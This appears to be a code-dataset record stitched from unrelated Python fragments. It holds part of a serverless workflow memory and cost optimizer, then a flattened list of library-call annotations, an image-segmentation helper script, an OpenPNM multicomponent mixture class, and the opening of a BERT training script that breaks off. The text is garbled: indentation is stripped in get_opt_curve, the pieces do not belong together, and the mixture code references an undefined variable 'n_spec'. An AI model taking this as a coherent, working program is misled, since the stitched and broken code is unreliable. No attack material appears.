                    cost_reduction_of_each_mem_config = {item: cost_reduction_of_each_mem_config[item] for item in
                                                         cost_reduction_of_each_mem_config.keys() if
                                                         cost_reduction_of_each_mem_config[item][0] /
                                                         cost_reduction_of_each_mem_config[item][
                                                             1] > last_e2ert_cost_BCR * BCRthreshold}
                elif (BCR and BCRtype == "MAX"):
                    # Attach the cost/RT ratio as a third tuple member
                    cost_reduction_of_each_mem_config = {item: (
                        cost_reduction_of_each_mem_config[item][0], cost_reduction_of_each_mem_config[item][1],
                        cost_reduction_of_each_mem_config[item][0] / cost_reduction_of_each_mem_config[item][1]) for
                        item in
                        cost_reduction_of_each_mem_config.keys()}
                if (len(cost_reduction_of_each_mem_config) != 0):
                    if (BCR and BCRtype == "MAX"):
                        max_BCR = np.max([item[2] for item in cost_reduction_of_each_mem_config.values()])
                        max_cost_reduction_under_MAX_BCR = np.max(
                            [item[0] for item in cost_reduction_of_each_mem_config.values() if
                             item[2] == max_BCR])
                        min_increased_rt_under_MAX_rt_reduction_MAX_BCR = np.min(
                            [item[1] for item in cost_reduction_of_each_mem_config.values() if
                             item[0] == max_cost_reduction_under_MAX_BCR and item[2] == max_BCR])
                        # Map the winning value tuple back to its memory size
                        reversed_dict = dict(zip(cost_reduction_of_each_mem_config.values(),
                                                 cost_reduction_of_each_mem_config.keys()))
                        max_cost_reduction_of_each_node[node] = (reversed_dict[(
                            max_cost_reduction_under_MAX_BCR, min_increased_rt_under_MAX_rt_reduction_MAX_BCR,
                            max_BCR)],
                                                                 max_cost_reduction_under_MAX_BCR,
                                                                 min_increased_rt_under_MAX_rt_reduction_MAX_BCR,
                                                                 max_BCR)
                    else:
                        max_cost_reduction = np.max([item[0] for item in cost_reduction_of_each_mem_config.values()])
                        min_increased_rt_under_MAX_cost_reduction = np.min(
                            [item[1] for item in cost_reduction_of_each_mem_config.values() if
                             item[0] == max_cost_reduction])
                        reversed_dict = dict(
                            zip(cost_reduction_of_each_mem_config.values(), cost_reduction_of_each_mem_config.keys()))
                        max_cost_reduction_of_each_node[node] = (
                            reversed_dict[(max_cost_reduction, min_increased_rt_under_MAX_cost_reduction)],
                            max_cost_reduction,
                            min_increased_rt_under_MAX_cost_reduction)
            if (len(max_cost_reduction_of_each_node) == 0):
                # No viable downgrade on this path: try the next least
                # critical path, or stop when every path is exhausted
                if (order >= self.simple_paths_num - 1):
                    break
                else:
                    order += 1
                    continue
            if (BCR and BCRtype == "MAX"):
                max_BCR = np.max([item[3] for item in max_cost_reduction_of_each_node.values()])
                max_cost_reduction_under_MAX_BCR = np.max(
                    [item[1] for item in max_cost_reduction_of_each_node.values() if item[3] == max_BCR])
                target_node = [key for key in max_cost_reduction_of_each_node if
                               max_cost_reduction_of_each_node[key][3] == max_BCR and
                               max_cost_reduction_of_each_node[key][1] == max_cost_reduction_under_MAX_BCR][0]
                target_mem = max_cost_reduction_of_each_node[target_node][0]
            else:
                max_cost_reduction = np.max([item[1] for item in max_cost_reduction_of_each_node.values()])
                min_increased_rt_under_MAX_cost_reduction = np.min(
                    [item[2] for item in max_cost_reduction_of_each_node.values() if item[1] == max_cost_reduction])
                target_mem = np.min([item[0] for item in max_cost_reduction_of_each_node.values() if
                                     item[1] == max_cost_reduction and item[
                                         2] == min_increased_rt_under_MAX_cost_reduction])
                target_node = [key for key in max_cost_reduction_of_each_node if
                               max_cost_reduction_of_each_node[key] == (
                                   target_mem, max_cost_reduction, min_increased_rt_under_MAX_cost_reduction)][0]
            # Commit the best downgrade and refresh the running totals
            self.update_App_workflow_mem_rt(self.App, {target_node: target_mem})
            max_cost_reduction = max_cost_reduction_of_each_node[target_node][1]
            min_increased_rt_under_MAX_cost_reduction = max_cost_reduction_of_each_node[target_node][2]
            current_cost = current_cost - max_cost_reduction
            performance_surplus = performance_surplus - min_increased_rt_under_MAX_cost_reduction
            current_avg_rt = current_avg_rt + min_increased_rt_under_MAX_cost_reduction
            current_e2ert_cost_BCR = max_cost_reduction / min_increased_rt_under_MAX_cost_reduction
            if (current_e2ert_cost_BCR == float('Inf')):
                last_e2ert_cost_BCR = 0
            else:
                last_e2ert_cost_BCR = current_e2ert_cost_BCR
        current_mem_configuration = nx.get_node_attributes(self.App.workflowG, 'mem')
        # The virtual Start/End nodes are not real functions
        del current_mem_configuration['Start']
        del current_mem_configuration['End']
        print('Optimized Memory Configuration: {}'.format(current_mem_configuration))
        print('Average end-to-end response time: {}'.format(current_avg_rt))
        print('Average Cost: {}'.format(current_cost))
        print('PRCPG_BCPC Optimization Completed.')
        return (current_avg_rt, current_cost, current_mem_configuration, iterations_count)
def get_opt_curve(self, filenameprefix, budget_list, performance_constraint_list, BCRthreshold=0.2):
'''
Get the Optimization Curve and save as csv
Args:
nop_cost (int): the number of evenly spaced budgets in the range of Cost
nop_rt (int): the number of evenly spaced performance constraints in the range of RT
'''
BPBC_data = pd.DataFrame()
for budget in budget_list:
aRow = {'Budget': budget, 'BCR_threshold': BCRthreshold}
rt, cost, config, iterations = self.PRCPG_BPBC(budget, BCR=False)
aRow['BCR_disabled_RT'] = rt
aRow['BCR_disabled_Cost'] = cost
aRow['BCR_disabled_Config'] = config
aRow['BCR_disabled_Iterations'] = iterations
rt, cost, config, iterations = self.PRCPG_BPBC(budget, BCR=True, BCRtype='RT/M',
BCRthreshold=BCRthreshold)
aRow['BCR_RT/M_RT'] = rt
aRow['BCR_RT/M_Cost'] = cost
aRow['BCR_RT/M_Config'] = config
aRow['BCR_RT/M_Iterations'] = iterations
rt, cost, config, iterations = self.PRCPG_BPBC(budget, BCR=True, BCRtype='ERT/C',
BCRthreshold=BCRthreshold)
aRow['BCR_ERT/C_RT'] = rt
aRow['BCR_ERT/C_Cost'] = cost
aRow['BCR_ERT/C_Config'] = config
aRow['BCR_ERT/C_Iterations'] = iterations
rt, cost, config, iterations = self.PRCPG_BPBC(budget, BCR=True, BCRtype='MAX')
aRow['BCR_MAX_RT'] = rt
aRow['BCR_MAX_Cost'] = cost
aRow['BCR_MAX_Config'] = config
aRow['BCR_MAX_Iterations'] = iterations
aRow = pd.Series(aRow)
BPBC_data = BPBC_data.append(aRow, ignore_index=True)
BPBC_data = BPBC_data[
['Budget', 'BCR_disabled_RT', 'BCR_RT/M_RT', 'BCR_ERT/C_RT', 'BCR_MAX_RT', 'BCR_disabled_Cost',
'BCR_RT/M_Cost', 'BCR_ERT/C_Cost', 'BCR_MAX_Cost', 'BCR_disabled_Config', 'BCR_RT/M_Config',
'BCR_ERT/C_Config', 'BCR_MAX_Config', 'BCR_disabled_Iterations', 'BCR_RT/M_Iterations',
'BCR_ERT/C_Iterations', 'BCR_MAX_Iterations', 'BCR_threshold']]
BPBC_data.to_csv(filenameprefix + '_BPBC.csv', index=False)
BCPC_data = pd.DataFrame()
for perf_constraint in performance_constraint_list:
aRow = {'Performance_Constraint': perf_constraint, 'BCR_threshold': BCRthreshold}
rt, cost, config, iterations = self.PRCPG_BCPC(rt_constraint=perf_constraint, BCR=False)
aRow['BCR_disabled_RT'] = rt
aRow['BCR_disabled_Cost'] = cost
aRow['BCR_disabled_Config'] = config
aRow['BCR_disabled_Iterations'] = iterations
rt, cost, config, iterations = self.PRCPG_BCPC(rt_constraint=perf_constraint, BCR=True, BCRtype='RT/M',
BCRthreshold=BCRthreshold)
aRow['BCR_M/RT_RT'] = rt
aRow['BCR_M/RT_Cost'] = cost
aRow['BCR_M/RT_Config'] = config
aRow['BCR_M/RT_Iterations'] = iterations
rt, cost, config, iterations = self.PRCPG_BCPC(rt_constraint=perf_constraint, BCR=True,
BCRtype='ERT/C', BCRthreshold=BCRthreshold)
aRow['BCR_C/ERT_RT'] = rt
aRow['BCR_C/ERT_Cost'] = cost
aRow['BCR_C/ERT_Config'] = config
aRow['BCR_C/ERT_Iterations'] = iterations
rt, cost, config, iterations = self.PRCPG_BCPC(rt_constraint=perf_constraint, BCR=True, BCRtype='MAX')
aRow['BCR_MAX_RT'] = rt
aRow['BCR_MAX_Cost'] = cost
aRow['BCR_MAX_Config'] = config
aRow['BCR_MAX_Iterations'] = iterations
aRow = pd.Series(aRow)
BCPC_data = BCPC_data.append(aRow, ignore_index=True)
BCPC_data = BCPC_data[
['Performance_Constraint', 'BCR_disabled_RT', 'BCR_M/RT_RT', 'BCR_C/ERT_RT', 'BCR_MAX_RT',
'BCR_disabled_Cost',
'BCR_M/RT_Cost', 'BCR_C/ERT_Cost', 'BCR_MAX_Cost', 'BCR_disabled_Config', 'BCR_M/RT_Config',
'BCR_C/ERT_Config', 'BCR_MAX_Config', 'BCR_disabled_Iterations', 'BCR_M/RT_Iterations',
'BCR_C/ERT_Iterations', 'BCR_MAX_Iterations', 'BCR_threshold']]
BCPC_data.to_csv(filenameprefix + '_BCPC.csv', index=False)
| [
"pandas.DataFrame",
"tqdm.tqdm",
"numpy.multiply",
"numpy.abs",
"networkx.set_node_attributes",
"warnings.filterwarnings",
"networkx.get_node_attributes",
"numpy.argsort",
"numpy.array",
"pandas.Series",
"networkx.all_simple_paths",
"itertools.product",
"AppGenerator.AppGenerator",
"iterto... | [((211, 244), 'warnings.filterwarnings', 'warnings.filterwarnings', (['"""ignore"""'], {}), "('ignore')\n", (234, 244), False, 'import warnings\n'), ((401, 434), 'AppGenerator.AppGenerator', 'AppGenerator', ([], {'seed': '(16)', 'type': '"""4PL"""'}), "(seed=16, type='4PL')\n", (413, 434), False, 'from AppGenerator import AppGenerator\n'), ((1698, 1760), 'networkx.set_node_attributes', 'nx.set_node_attributes', (['self.App.workflowG', '{}', '"""perf_profile"""'], {}), "(self.App.workflowG, {}, 'perf_profile')\n", (1720, 1760), True, 'import networkx as nx\n'), ((2969, 2983), 'pandas.DataFrame', 'pd.DataFrame', ([], {}), '()\n', (2981, 2983), True, 'import pandas as pd\n'), ((3603, 3645), 'itertools.product', 'itertools.product', (['*all_available_mem_list'], {}), '(*all_available_mem_list)\n', (3620, 3645), False, 'import itertools\n'), ((7590, 7619), 'numpy.multiply', 'np.multiply', (['tp_list', 'rt_list'], {}), '(tp_list, rt_list)\n', (7601, 7619), True, 'import numpy as np\n'), ((18651, 18700), 'networkx.get_node_attributes', 'nx.get_node_attributes', (['self.App.workflowG', '"""mem"""'], {}), "(self.App.workflowG, 'mem')\n", (18673, 18700), True, 'import networkx as nx\n'), ((27723, 27772), 'networkx.get_node_attributes', 'nx.get_node_attributes', (['self.App.workflowG', '"""mem"""'], {}), "(self.App.workflowG, 'mem')\n", (27745, 27772), True, 'import networkx as nx\n'), ((28623, 28637), 'pandas.DataFrame', 'pd.DataFrame', ([], {}), '()\n', (28635, 28637), True, 'import pandas as pd\n'), ((30624, 30638), 'pandas.DataFrame', 'pd.DataFrame', ([], {}), '()\n', (30636, 30638), True, 'import pandas as pd\n'), ((7227, 7240), 'numpy.abs', 'np.abs', (['slope'], {}), '(slope)\n', (7233, 7240), True, 'import numpy as np\n'), ((11975, 12024), 'networkx.get_node_attributes', 'nx.get_node_attributes', (['self.App.workflowG', '"""mem"""'], {}), "(self.App.workflowG, 'mem')\n", (11997, 12024), True, 'import networkx as nx\n'), ((21018, 21067), 
'networkx.get_node_attributes', 'nx.get_node_attributes', (['self.App.workflowG', '"""mem"""'], {}), "(self.App.workflowG, 'mem')\n", (21040, 21067), True, 'import networkx as nx\n'), ((30010, 30025), 'pandas.Series', 'pd.Series', (['aRow'], {}), '(aRow)\n', (30019, 30025), True, 'import pandas as pd\n'), ((32153, 32168), 'pandas.Series', 'pd.Series', (['aRow'], {}), '(aRow)\n', (32162, 32168), True, 'import pandas as pd\n'), ((1292, 1371), 'networkx.all_simple_paths', 'nx.all_simple_paths', (['self.App.deloopedG', 'self.App.startPoint', 'self.App.endPoint'], {}), '(self.App.deloopedG, self.App.startPoint, self.App.endPoint)\n', (1311, 1371), True, 'import networkx as nx\n'), ((3909, 3930), 'tqdm.tqdm', 'tqdm', ([], {'total': 'task_size'}), '(total=task_size)\n', (3913, 3930), False, 'from tqdm import tqdm\n'), ((4759, 4780), 'tqdm.tqdm', 'tqdm', ([], {'total': 'task_size'}), '(total=task_size)\n', (4763, 4780), False, 'from tqdm import tqdm\n'), ((7667, 7688), 'numpy.argsort', 'np.argsort', (['prrt_list'], {}), '(prrt_list)\n', (7677, 7688), True, 'import numpy as np\n'), ((7729, 7750), 'numpy.argsort', 'np.argsort', (['prrt_list'], {}), '(prrt_list)\n', (7739, 7750), True, 'import numpy as np\n'), ((7131, 7158), 'numpy.array', 'np.array', (['available_rt_list'], {}), '(available_rt_list)\n', (7139, 7158), True, 'import numpy as np\n'), ((4517, 4532), 'pandas.Series', 'pd.Series', (['aRow'], {}), '(aRow)\n', (4526, 4532), True, 'import pandas as pd\n'), ((5367, 5382), 'pandas.Series', 'pd.Series', (['aRow'], {}), '(aRow)\n', (5376, 5382), True, 'import pandas as pd\n'), ((8449, 8599), 'numpy.abs', 'np.abs', (["((item[1] - item[0]) / (self.App.workflowG.nodes[node]['perf_profile'][item\n [1]] - self.App.workflowG.nodes[node]['perf_profile'][item[0]]))"], {}), "((item[1] - item[0]) / (self.App.workflowG.nodes[node]['perf_profile'\n ][item[1]] - self.App.workflowG.nodes[node]['perf_profile'][item[0]]))\n", (8455, 8599), True, 'import numpy as np\n'), ((8855, 9005), 
'numpy.abs', 'np.abs', (["((self.App.workflowG.nodes[node]['perf_profile'][item[1]] - self.App.\n workflowG.nodes[node]['perf_profile'][item[0]]) / (item[1] - item[0]))"], {}), "((self.App.workflowG.nodes[node]['perf_profile'][item[1]] - self.App.\n workflowG.nodes[node]['perf_profile'][item[0]]) / (item[1] - item[0]))\n", (8861, 9005), True, 'import numpy as np\n'), ((9488, 9524), 'itertools.chain', 'itertools.chain', (['*available_mem_list'], {}), '(*available_mem_list)\n', (9503, 9524), False, 'import itertools\n')] |
import cv2
import numpy as np
import tensorflow as tf
import matplotlib.pyplot as plt
def view_img_mask(img, mask, thres_val, model=False):
    """Show an image beside its ground-truth mask; when a model is
    supplied, add its thresholded prediction as a third panel."""
    if not model:
        fig, axes = plt.subplots(1, 2, figsize=(12, 8))
        axes[0].imshow(img)
        axes[1].imshow(mask)
    else:
        batch = np.expand_dims(img, axis=0)
        pred = model.predict(batch).reshape((1, img.shape[0], img.shape[1], 1))
        pred = np.squeeze(pred)
        fig, axes = plt.subplots(1, 3, figsize=(18, 8))
        axes[0].imshow(img)
        axes[1].imshow(mask)
        axes[2].imshow(pred > thres_val)
    plt.show()
def predict_img(img_path, thres_val, base_model=False):
    """Load an image from disk, predict its mask with ``base_model`` on a
    128x128 resize, and display the input beside the thresholded mask."""
    image = plt.imread(img_path)
    image = cv2.resize(image, (128, 128))
    batch = np.expand_dims(image, axis=0)
    prediction = np.squeeze(base_model.predict(batch).reshape((1, 128, 128, 1)))
    fig, axes = plt.subplots(1, 2, figsize=(18, 8))
    axes[0].imshow(image)
    axes[1].imshow(prediction > thres_val)
    plt.show()
def video_predict(file_path, base_model, thresh_val):
    '''
    Read a video and predict a segmentation mask for one frame every
    half second.

    Args:
        file_path (str): path of the video file
        base_model: trained model exposing a Keras-style ``predict``
        thresh_val (float): threshold applied to the predicted mask

    Returns:
        list of (frame, mask) tuples; ``frame`` is the 128x128 resized
        frame and ``mask`` a float array of 0/255 values.
    '''
    WIDTH, HEIGHT = 128, 128

    def getFrame(sec, img_mask_ds):
        # Grab the frame at `sec` seconds; append (frame, mask) on success.
        vidcap = cv2.VideoCapture(file_path)
        vidcap.set(cv2.CAP_PROP_POS_MSEC, sec * 1000)
        hasFrames, image = vidcap.read()
        vidcap.release()  # avoid leaking the capture handle
        if hasFrames:
            image = cv2.resize(image, (WIDTH, HEIGHT))
            pred_img = base_model.predict(np.expand_dims(image, axis=0)).reshape((1, WIDTH, HEIGHT, 1))
            pred_img = np.squeeze(pred_img)
            img_mask_ds.append((image, (pred_img > thresh_val).astype(float) * 255))
        return hasFrames, img_mask_ds

    img_mask_ds = []
    sec = 0
    frameRate = 0.5  # capture one frame every 0.5 s
    # BUG FIX: the original called getFrame with a missing third argument
    # (TypeError) and bound the returned (flag, list) tuple to a single
    # name on the first call; both are corrected here.
    success, img_mask_ds = getFrame(sec, img_mask_ds)
    while success:
        sec = round(sec + frameRate, 2)
        success, img_mask_ds = getFrame(sec, img_mask_ds)
    return img_mask_ds
"matplotlib.pyplot.show",
"numpy.expand_dims",
"cv2.VideoCapture",
"numpy.squeeze",
"matplotlib.pyplot.imread",
"matplotlib.pyplot.subplots",
"cv2.resize"
] | [((644, 664), 'matplotlib.pyplot.imread', 'plt.imread', (['img_path'], {}), '(img_path)\n', (654, 664), True, 'import matplotlib.pyplot as plt\n'), ((675, 702), 'cv2.resize', 'cv2.resize', (['img', '(128, 128)'], {}), '(img, (128, 128))\n', (685, 702), False, 'import cv2\n'), ((799, 815), 'numpy.squeeze', 'np.squeeze', (['pred'], {}), '(pred)\n', (809, 815), True, 'import numpy as np\n'), ((830, 865), 'matplotlib.pyplot.subplots', 'plt.subplots', (['(1)', '(2)'], {'figsize': '(18, 8)'}), '(1, 2, figsize=(18, 8))\n', (842, 865), True, 'import matplotlib.pyplot as plt\n'), ((928, 938), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (936, 938), True, 'import matplotlib.pyplot as plt\n'), ((275, 291), 'numpy.squeeze', 'np.squeeze', (['pred'], {}), '(pred)\n', (285, 291), True, 'import numpy as np\n'), ((310, 345), 'matplotlib.pyplot.subplots', 'plt.subplots', (['(1)', '(3)'], {'figsize': '(18, 8)'}), '(1, 3, figsize=(18, 8))\n', (322, 345), True, 'import matplotlib.pyplot as plt\n'), ((467, 502), 'matplotlib.pyplot.subplots', 'plt.subplots', (['(1)', '(2)'], {'figsize': '(12, 8)'}), '(1, 2, figsize=(12, 8))\n', (479, 502), True, 'import matplotlib.pyplot as plt\n'), ((565, 575), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (573, 575), True, 'import matplotlib.pyplot as plt\n'), ((1249, 1276), 'cv2.VideoCapture', 'cv2.VideoCapture', (['file_path'], {}), '(file_path)\n', (1265, 1276), False, 'import cv2\n'), ((1441, 1475), 'cv2.resize', 'cv2.resize', (['image', '(WIDTH, HEIGHT)'], {}), '(image, (WIDTH, HEIGHT))\n', (1451, 1475), False, 'import cv2\n'), ((1603, 1623), 'numpy.squeeze', 'np.squeeze', (['pred_img'], {}), '(pred_img)\n', (1613, 1623), True, 'import numpy as np\n'), ((733, 760), 'numpy.expand_dims', 'np.expand_dims', (['img'], {'axis': '(0)'}), '(img, axis=0)\n', (747, 760), True, 'import numpy as np\n'), ((187, 214), 'numpy.expand_dims', 'np.expand_dims', (['img'], {'axis': '(0)'}), '(img, axis=0)\n', (201, 214), True, 'import numpy as 
np\n'), ((1518, 1547), 'numpy.expand_dims', 'np.expand_dims', (['image'], {'axis': '(0)'}), '(image, axis=0)\n', (1532, 1547), True, 'import numpy as np\n')] |
# from collections import ChainMap # Might use eventually
import numpy as np
from openpnm.phases import GenericPhase as GenericPhase
from openpnm.utils import logging, HealthDict, PrintableList
logger = logging.getLogger(__name__)
class GenericMixture(GenericPhase):
r"""
Creates Phase object that represents a multicomponent mixture system
consisting of a given list of OpenPNM Phase objects as components.
Parameters
----------
network : OpenPNM Network object
The network to which this phase object will be attached.
components : list of OpenPNM Phase objects
A list of all components that constitute this mixture
project : OpenPNM Project object, optional
The Project with which this phase should be associted. If a
``network`` is given then this is ignored and the Network's project
is used. If a ``network`` is not given then this is mandatory.
name : string, optional
The name of the phase. This is useful to keep track of the objects
throughout the simulation. The name must be unique to the project.
If no name is given, one is generated.
"""
def __init__(self, components=[], settings={}, **kwargs):
self.settings.update({'components': [],
})
super().__init__(settings={'prefix': 'mix'}, **kwargs)
self.settings.update(settings)
# Add any supplied phases to the phases list
for comp in components:
self.settings['components'].append(comp.name)
self['pore.mole_fraction.'+comp.name] = 0.0
self['pore.mole_fraction.all'] = np.zeros(self.Np, dtype=float)
logger.warning('Mixtures are a beta feature and functionality may ' +
'change in future versions')
def __getitem__(self, key):
try:
vals = super().__getitem__(key)
except KeyError:
try:
# If key ends in component name, fetch it
if key.split('.')[-1] in self.settings['components']:
comp = self.project[key.split('.')[-1]]
vals = comp[key.rsplit('.', maxsplit=1)[0]]
return vals
else:
raise KeyError
except KeyError:
vals = self.interleave_data(key)
return vals
def __setitem__(self, key, value):
# Prevent writing 'element.property.component' on mixture
invalid_keys = set(self.props(deep=True)).difference(set(self.props()))
if key in invalid_keys:
raise Exception(key + ' already assigned to a component object')
super().__setitem__(key, value)
def props(self, deep=False, **kwargs):
temp = PrintableList()
if deep:
for item in self.components.values():
temp.extend([prop+'.'+item.name for prop in item.props(**kwargs)])
temp.extend(super().props(**kwargs))
temp.sort()
return temp
def __str__(self):
horizontal_rule = '―' * 78
lines = super().__str__()
lines = '\n'.join((lines, 'Component Phases', horizontal_rule))
for item in self.components.values():
lines = '\n'.join((lines, item.__module__.replace('__', '') +
' : ' + item.name))
lines = '\n'.join((lines, horizontal_rule))
return lines
def _update_total_molfrac(self):
# Update mole_fraction.all
self['pore.mole_fraction.all'] = 0.0
dict_ = list(self['pore.mole_fraction'].values())
if len(dict_) > 1:
self['pore.mole_fraction.all'] = np.sum(dict_, axis=0)
self['throat.mole_fraction.all'] = 0.0
dict_ = list(self['throat.mole_fraction'].values())
if len(dict_) > 1:
self['throat.mole_fraction.all'] = np.sum(dict_, axis=0)
def update_concentrations(self, mole_fraction='pore.mole_fraction'):
r"""
Re-calculates the concentration of each species in the mixture based
on the current mole fractions.
This method looks up the mole fractions *and* the density of the
mixture, then finds the respective concentrations in $mol/m^{3}$.
Parameters
----------
"""
density = self['pore.molar_density']
for item in self.components.values():
mf = self['pore.mole_fraction.'+item.name]
self['pore.concentration.'+item.name] = density*mf
def update_mole_fractions(self, concentration='pore.concentration',
molar_density='pore.molar_density'):
r"""
Re-calculates mole fraction of each species in mixture based on the
current concentrations.
This method looks up the concentration of each species (using the
optionally specified concentration dictionary key), and calculates
the mole fraction. Optionally, it can use a molar density for the
mixture and N-1 concentrations to determine the Nth concentration and
all species mole fractions.
Parameters
----------
concentration : string, optional
The dictionary key pointing to the desired concentration values.
The default is 'pore.concentration'. Given this value, lookups
are performed for each species in the mixture.
molar_density : string, optional
The dictionary key pointing to the molar density of the mixture.
If not given (default), then 'pore.molar_density' is used. If
there are N-1 concentrations specified, then ``molar_density`` is
automatically used to find the Nth concentration.
Notes
-----
The method does not return any values. Instead it updates the mole
fraction arrays of each species directly.
"""
concentrations = [concentration + '.' + comp for comp
in self.settings['components']
if concentration + '.' + comp in self.keys()]
if len(concentrations) == len(self.components):
# Find total number of moles per unit volume
density = 0.0
for conc in concentrations:
density += self[conc]
# Normalize moles per unit volume for each species by the total
for conc in concentrations:
element, quantity, component = conc.split('.')
self[element+'.mole_fraction.'+component] = self[conc]/density
elif len(concentrations) == (len(self.components) - 1):
# Find mole fraction of N-1 species
mol_frac = 0.0
density = self[molar_density]
for conc in concentrations:
element, quantity, component = conc.split('.')
self[element+'.mole_fraction.'+component] = self[conc]/density
mol_frac += self[element+'.mole_fraction.'+component]
# Find mole fraction of Nth species using molar_density
given_comps = [conc.split('.')[2] for conc in concentrations]
all_comps = self.settings['components']
component = list(set(all_comps).difference(set(given_comps)))[0]
self[element+'.mole_fraction.'+component] = 1 - mol_frac
# [self[element+'.concentration.'+component] = (1 - mol_frac)*density
else:
raise Exception('Insufficient concentration values found ' +
'for component species, must specify ' +
str(abs(n_spec + 1)) + ' additional values')
def set_concentration(self, component, values=[]):
r"""
Specify mole fraction of each component in each pore
Parameters
----------
components : OpenPNM Phase object or name string
The phase whose mole fraction is being specified
values : array_like
The concentration of the given ``component `` in each pore. This
array must be *Np*-long, with one value for each pore in the
network. If a scalar is received it is applied to all pores.
See Also
--------
set_mole_fraction
"""
if type(component) == str:
component = self.components[component]
Pvals = np.array(values, ndmin=1)
if component not in self.project:
raise Exception(f"{component.name} doesn't belong to this project")
else:
if component.name not in self.settings['components']:
self.settings['components'].append(component.name)
if np.any(Pvals < 0.0):
logger.warning('Received values contain negative concentrations')
if Pvals.size:
self['pore.concentration.' + component.name] = Pvals
def set_mole_fraction(self, component, values=[]):
r"""
Specify mole fraction of each component in each pore
Parameters
----------
components : OpenPNM Phase object or name string
The phase whose mole fraction is being specified
values : array_like
The mole fraction of the given ``component `` in each pore. This
array must be *Np*-long, with one value between 0 and 1 for each
pore in the network. If a scalar is received it is applied to
all pores.
See Also
--------
set_concentration
"""
if type(component) == str:
component = self.components[component]
Pvals = np.array(values, ndmin=1)
if component not in self.project:
raise Exception(f"{component.name} doesn't belong to this project")
else:
if component.name not in self.settings['components']:
self.settings['components'].append(component.name)
if np.any(Pvals > 1.0) or np.any(Pvals < 0.0):
logger.warning('Received values contain mole fractions outside ' +
'the range of 0 to 1')
if Pvals.size:
self['pore.mole_fraction.' + component.name] = Pvals
self._update_total_molfrac()
def _get_comps(self):
comps = {item: self.project[item] for item in self.settings['components']}
return comps
def _set_comps(self, components):
if not isinstance(components, list):
components = [components]
self.settings['components'] = [val.name for val in components]
components = property(fget=_get_comps, fset=_set_comps)
def interleave_data(self, prop):
r"""
Gathers property values from component phases to build a single array
If the requested ``prop`` is not on this Mixture, then a search is
conducted on all associated components objects, and values from each
are assembled into a single array.
Parameters
----------
prop : string
The property to be retrieved
Returns
-------
array : ND-array
An array containing the specified property retrieved from each
component phase and assembled based on the specified mixing rule
"""
element = prop.split('.')[0]
if element == 'pore':
if np.any(self[element + '.mole_fraction.all'] != 1.0):
self._update_total_molfrac()
if np.any(self[element + '.mole_fraction.all'] != 1.0):
raise Exception('Mole fraction does not add to unity in all ' +
element + 's')
vals = np.zeros([self._count(element=element)], dtype=float)
try:
for comp in self.components.values():
vals += comp[prop]*self[element+'.mole_fraction.'+comp.name]
except KeyError:
vals = super().interleave_data(prop)
return vals
def check_mixture_health(self):
r"""
Checks the "health" of the mixture
Calculates the mole fraction of all species in each pore and returns
an list of where values are too low or too high
Returns
-------
health : dict
A HealtDict object containing lists of locations where the mole
fractions are not unity. One value indiates locations that are
too high, and another where they are too low.
"""
h = HealthDict()
h['mole_fraction_too_low'] = []
h['mole_fraction_too_high'] = []
self._update_total_molfrac()
lo = np.where(self['pore.mole_fraction.all'] < 1.0)[0]
hi = np.where(self['pore.mole_fraction.all'] > 1.0)[0]
if len(lo) > 0:
h['mole_fraction_too_low'] = lo
if len(hi) > 0:
h['mole_fraction_too_high'] = hi
return h
| [
"numpy.sum",
"numpy.zeros",
"numpy.any",
"numpy.where",
"numpy.array",
"openpnm.utils.logging.getLogger",
"openpnm.utils.PrintableList",
"openpnm.utils.HealthDict"
] | [((204, 231), 'openpnm.utils.logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (221, 231), False, 'from openpnm.utils import logging, HealthDict, PrintableList\n'), ((1655, 1685), 'numpy.zeros', 'np.zeros', (['self.Np'], {'dtype': 'float'}), '(self.Np, dtype=float)\n', (1663, 1685), True, 'import numpy as np\n'), ((2781, 2796), 'openpnm.utils.PrintableList', 'PrintableList', ([], {}), '()\n', (2794, 2796), False, 'from openpnm.utils import logging, HealthDict, PrintableList\n'), ((8384, 8409), 'numpy.array', 'np.array', (['values'], {'ndmin': '(1)'}), '(values, ndmin=1)\n', (8392, 8409), True, 'import numpy as np\n'), ((8690, 8709), 'numpy.any', 'np.any', (['(Pvals < 0.0)'], {}), '(Pvals < 0.0)\n', (8696, 8709), True, 'import numpy as np\n'), ((9622, 9647), 'numpy.array', 'np.array', (['values'], {'ndmin': '(1)'}), '(values, ndmin=1)\n', (9630, 9647), True, 'import numpy as np\n'), ((12468, 12480), 'openpnm.utils.HealthDict', 'HealthDict', ([], {}), '()\n', (12478, 12480), False, 'from openpnm.utils import logging, HealthDict, PrintableList\n'), ((3689, 3710), 'numpy.sum', 'np.sum', (['dict_'], {'axis': '(0)'}), '(dict_, axis=0)\n', (3695, 3710), True, 'import numpy as np\n'), ((3892, 3913), 'numpy.sum', 'np.sum', (['dict_'], {'axis': '(0)'}), '(dict_, axis=0)\n', (3898, 3913), True, 'import numpy as np\n'), ((9928, 9947), 'numpy.any', 'np.any', (['(Pvals > 1.0)'], {}), '(Pvals > 1.0)\n', (9934, 9947), True, 'import numpy as np\n'), ((9951, 9970), 'numpy.any', 'np.any', (['(Pvals < 0.0)'], {}), '(Pvals < 0.0)\n', (9957, 9970), True, 'import numpy as np\n'), ((11343, 11394), 'numpy.any', 'np.any', (["(self[element + '.mole_fraction.all'] != 1.0)"], {}), "(self[element + '.mole_fraction.all'] != 1.0)\n", (11349, 11394), True, 'import numpy as np\n'), ((12612, 12658), 'numpy.where', 'np.where', (["(self['pore.mole_fraction.all'] < 1.0)"], {}), "(self['pore.mole_fraction.all'] < 1.0)\n", (12620, 12658), True, 'import numpy as np\n'), 
((12675, 12721), 'numpy.where', 'np.where', (["(self['pore.mole_fraction.all'] > 1.0)"], {}), "(self['pore.mole_fraction.all'] > 1.0)\n", (12683, 12721), True, 'import numpy as np\n'), ((11460, 11511), 'numpy.any', 'np.any', (["(self[element + '.mole_fraction.all'] != 1.0)"], {}), "(self[element + '.mole_fraction.all'] != 1.0)\n", (11466, 11511), True, 'import numpy as np\n')] |
import os
import numpy as np
import torch
from datasets import get_swag_data
from transformers import BertTokenizer, AdamW, get_linear_schedule_with_warmup
from modeling_bert import BertForMultipleChoice
import utils
from tqdm import tqdm
from torch.utils.tensorboard import SummaryWriter
from evaluation import evaluate_accuracy
import json
# os.environ["CUDA_VISIBLE_DEVICES"] = "1"
if __name__ == "__main__":
    # ---- Initialize: output dirs, tensorboard, seeding, wandb ----
    args = utils.parse_arguments()
    checkpoint_dir = os.path.join(args.checkpoint_dir, args.model_name)
